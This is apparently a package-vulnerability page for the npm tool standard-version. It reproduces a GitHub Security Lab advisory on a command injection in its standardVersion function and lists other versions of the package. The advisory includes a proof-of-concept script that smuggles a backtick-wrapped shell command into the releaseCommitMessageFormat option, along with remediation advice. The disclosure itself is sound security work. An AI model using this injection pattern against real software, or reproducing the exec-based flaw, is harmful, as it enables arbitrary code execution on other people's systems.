NodeJS/standard-version/4.0.0-1
replacement for `npm version` with automatic CHANGELOG generation
https://www.npmjs.com/package/standard-version
ISC
1 Security Vulnerabilities
Command Injection in standard-version
GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2020-111
The GitHub Security Lab team has identified a potential security vulnerability in standard-version.
Summary
The standardVersion function has a command injection vulnerability. Clients of the standard-version library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
Product
Standard Version
Tested Version
Commit 2f04ac8
Details
Issue 1: Command injection in standardVersion
The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:
npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"
Now create a file with the following contents:
var fs = require("fs");
// setting up a bit of environment: standardVersion needs a package.json to read the version from
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');
const standardVersion = require('standard-version');
standardVersion({
  noVerify: true,
  infile: 'foo.txt',
  // the format string ends up inside a shell-interpreted git command, so the backticks are executed
  releaseCommitMessageFormat: "bla `touch exploit`"
});
and run it:
node test.js
Notice that a file named exploit has been created.
This vulnerability is similar to command injection vulnerabilities that have been found in other JavaScript libraries. Here are some examples: CVE-2020-7646, CVE-2020-7614, CVE-2020-7597, CVE-2019-10778, CVE-2019-10776, CVE-2018-16462, CVE-2018-16461, CVE-2018-16460, CVE-2018-13797, CVE-2018-3786, CVE-2018-3772, CVE-2018-3746, CVE-2017-16100, CVE-2017-16042.
We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version project here.
Impact
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
Remediation
We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile instead of child_process.exec.
Credit
This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-111 in any communication regarding this issue.
Disclosure Policy
This report is subject to our coordinated disclosure policy.
42 Other Versions
Version | License | Security | Released | Age
---|---|---|---|---
9.5.0 | ISC | | 2022-05-15 - 13:46 | almost 2 years
9.3.2 | ISC | | 2021-10-17 - 20:48 | over 2 years
9.3.1 | ISC | | 2021-07-14 - 19:09 | almost 3 years
9.3.0 | ISC | | 2021-05-04 - 16:37 | almost 3 years
9.2.0 | ISC | | 2021-04-06 - 17:24 | about 3 years
9.1.1 | ISC | | 2021-02-17 - 21:47 | about 3 years
9.1.0 | ISC | | 2020-12-30 - 02:03 | over 3 years
9.0.0 | ISC | | 2020-08-15 - 00:27 | over 3 years
8.0.2 | ISC | | 2020-07-14 - 01:37 | almost 4 years
8.0.1 | ISC | | 2020-07-12 - 08:12 | almost 4 years
8.0.0 | ISC | 1 | 2020-05-06 - 20:03 | almost 4 years
7.1.0 | ISC | 1 | 2019-12-08 - 23:22 | over 4 years
7.0.1 | ISC | 1 | 2019-11-07 - 22:04 | over 4 years
7.0.0 | ISC | 1 | 2019-07-30 - 05:12 | over 4 years
6.0.1 | ISC | 1 | 2019-05-05 - 21:55 | almost 5 years
6.0.0 | ISC | 1 | 2019-05-05 - 21:26 | almost 5 years
6.0.0-beta.0 | ISC | 1 | 2019-05-05 - 21:25 | almost 5 years
5.0.2 | ISC | 1 | 2019-03-16 - 19:03 | about 5 years
5.0.1 | ISC | 1 | 2019-02-28 - 04:11 | about 5 years
5.0.0 | ISC | 1 | 2019-02-14 - 23:48 | about 5 years
5.0.0-candidate.0 | ISC | 1 | 2018-11-02 - 06:55 | over 5 years
4.4.0 | ISC | 1 | 2018-05-21 - 20:28 | almost 6 years
4.3.0 | ISC | 1 | 2018-01-03 - 06:50 | over 6 years
4.3.0-candidate.1 | ISC | 1 | 2018-01-03 - 05:27 | over 6 years
4.3.0-candidate.0 | ISC | 1 | 2017-12-20 - 06:15 | over 6 years
4.2.0 | ISC | 1 | 2017-06-12 - 22:34 | almost 7 years
4.1.0 | ISC | 1 | 2017-06-06 - 05:14 | almost 7 years
4.1.0-candidate.2 | ISC | 1 | 2017-06-06 - 00:12 | almost 7 years
4.1.0-candidate.1 | ISC | 1 | 2017-06-05 - 23:31 | almost 7 years
4.1.0-candidate.0 | ISC | 1 | 2017-06-05 - 00:05 | almost 7 years
4.0.0 | ISC | 1 | 2016-12-02 - 11:34 | over 7 years
4.0.0-1 | ISC | 1 | 2016-11-27 - 01:03 | over 7 years
4.0.0-0 | ISC | 1 | 2016-11-26 - 22:26 | over 7 years
3.0.0 | ISC | 1 | 2016-10-06 - 18:17 | over 7 years
2.4.0 | ISC | 1 | 2016-07-13 - 17:36 | almost 8 years
2.3.1 | ISC | 1 | 2016-06-15 - 23:04 | almost 8 years
2.3.0 | ISC | 1 | 2016-06-02 - 17:24 | almost 8 years
2.2.1 | ISC | 1 | 2016-05-02 - 04:26 | almost 8 years
2.2.0 | ISC | 1 | 2016-05-02 - 00:01 | almost 8 years
2.1.2 | ISC | 1 | 2016-04-11 - 02:20 | about 8 years
2.1.1 | ISC | 1 | 2016-04-10 - 00:10 | about 8 years
1.1.0 | ISC | 1 | 2016-04-08 - 23:29 | about 8 years